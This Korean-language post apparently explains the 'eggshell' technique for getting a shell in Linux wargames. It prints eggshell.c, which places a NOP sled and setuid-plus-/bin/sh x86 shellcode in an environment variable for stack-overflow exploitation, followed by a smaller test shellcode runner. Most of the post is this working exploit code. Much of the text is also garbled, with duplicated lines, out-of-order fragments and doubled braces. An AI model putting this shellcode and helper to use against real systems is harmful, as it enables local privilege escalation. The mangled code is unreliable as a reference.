wargame 이나 기타 linux 상에서 shell 을 얻기위해서는 eggshell 이란 놈을 이용하는 것이 편하다.
eggshell 에 대해서는 phrack 49-14호에 있는 smashing the stack for fun and profit 이란 문서를 보면 자세히 나와있다.
eggshell.c
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
for(i = 0; i < strlen(shellcode); i++)
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
putenv(egg);
memcpy(buff, "RET=", 4);
putenv(buff);
system("/bin/bash");
파일에 setuid 가 걸려있더라도 소스코드내에 setreuid() 가 없으면 권한이 바뀌지 않으므로, shellcode 앞에
setreuid(geteuid(),geteuid()) 관련 기계어를 넣어주었다.
좀더 작은 shellcode는 다음과 같다.
test_shell.c
eggshell 에 대해서는 phrack 49-14호에 있는 smashing the stack for fun and profit 이란 문서를 보면 자세히 나와있다.
eggshell.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <memory.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 256
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" //setuid(geteuid())
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <memory.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 256
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" //setuid(geteuid())
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char **argv)
{
int main(int argc, char **argv)
{
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if ( argc > 1 ) bsize = atoi(argv[1]);
if ( argc > 2 ) offset = atoi(argv[2]);
if ( argc > 3 ) eggsize = atoi(argv[3]);
if ( !(buff = malloc(bsize)))
{
if ( argc > 2 ) offset = atoi(argv[2]);
if ( argc > 3 ) eggsize = atoi(argv[3]);
if ( !(buff = malloc(bsize)))
{
printf("Can't allocate memory for bsize\n");
exit(0);
exit(0);
}
if ( !(egg = malloc(eggsize)))
{
{
printf("Can't allocate memory for eggsize");
exit(0);
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *)ptr;
for(i = 0; i < bsize; i+= 4)
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *)ptr;
for(i = 0; i < bsize; i+= 4)
*(addr_ptr++) = addr;
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for(i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
putenv(egg);
memcpy(buff, "RET=", 4);
putenv(buff);
system("/bin/bash");
}
파일에 setuid 가 걸려있더라도 소스코드내에 setreuid() 가 없으면 권한이 바뀌지 않으므로, shellcode 앞에
setreuid(geteuid(),geteuid()) 관련 기계어를 넣어주었다.
좀더 작은 shellcode는 다음과 같다.
test_shell.c
int main()
{
{
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1"
"\x31\xd2\xb0\x0b\xcd\x80";
"\x31\xd2\xb0\x0b\xcd\x80";
(*(void(*)())shellcode)();
return 0;
}